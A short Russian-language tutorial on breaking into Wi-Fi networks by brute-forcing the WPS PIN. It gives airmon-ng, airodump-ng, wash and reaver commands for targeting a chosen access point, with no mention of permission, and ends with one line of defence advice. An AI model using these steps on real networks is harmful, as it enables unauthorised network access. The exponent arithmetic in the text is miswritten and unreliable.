Взлом WiFi (WPS)

Взлом WiFi (WPS)

HACKING TIME

Суть атаки

Главное, что нам нужно - включенный WPS на точке доступа.
В случае ввода правильного пин-кода ТД сама предоставит нам необходимые данные для подключения.

А что если мы просто подберем нужным нам пин? Сам пин состоит из 8-ми цифр, число возможных комбинаций 10^8 = 100,000,000. Последняя цифра является контрольной суммой, которая вычисляется исхода из первых семи чисел. Число комбинаций уменьшается 10^7 = 10,000,000. Но это все равно много!

Странность протокола WPS заключается в том, что сначала проверяется первая часть пина, зачем вторая. К тому же, ТД оповестит нас о том, являются ли первые 4 цифры верными или нет. Что это значит? Сначала нужно подобрать 4 цифры 4^10 = 10,000, затем оставшиеся 3 цифры 3^10 = 1,000. Итого, число комбинаций для перебора снизилось до 10,000 + 1,000 = 11,000.

В Kali Linux есть такой инструмент как Reaver, который реализует данный способ атаки.

Весь процесс я произвожу в Kali Linux на Raspberry Pi


Процесс взлома

Для начала переводим адаптер в режим монитора

Сделать это можно так

# airmon-ng start wlan0

или

# iw dev wlan0 interface add mon0 type monitor

У вас появится интерфейс mon0 или wlan0mon

Сканирование сетей и выбор нужной

Запускаем

# airodump-ng --wps mon0

или

# wash -i mon0

Видим много (или не очень) сетей и информацию о них

<img>

Уязвимы только сети с версией WPS > 0, другие таким способом взломать не получится.

Запоминаем BSSID и CH (Channel, канал)

Взлом через Reaver

Минимальная команда для запуска выглядит так:

# reaver -i mon0 -b AA:BB:CC:DD:EE:FF -c 1 -v

Некоторые аргументы:

-b - BSSID атакуемой точки
-c
- Канал ТД
-m - Mac адрес клиента
-d - Задержка между попытками подключения в секундах

Запустили? Теперь ждите, взлом займет около суток.

Если все ок и WPS не залочился, в результате получаем пин и пароль:

<img>


Защита

Достаточно просто отключить WPS в настройках роутера.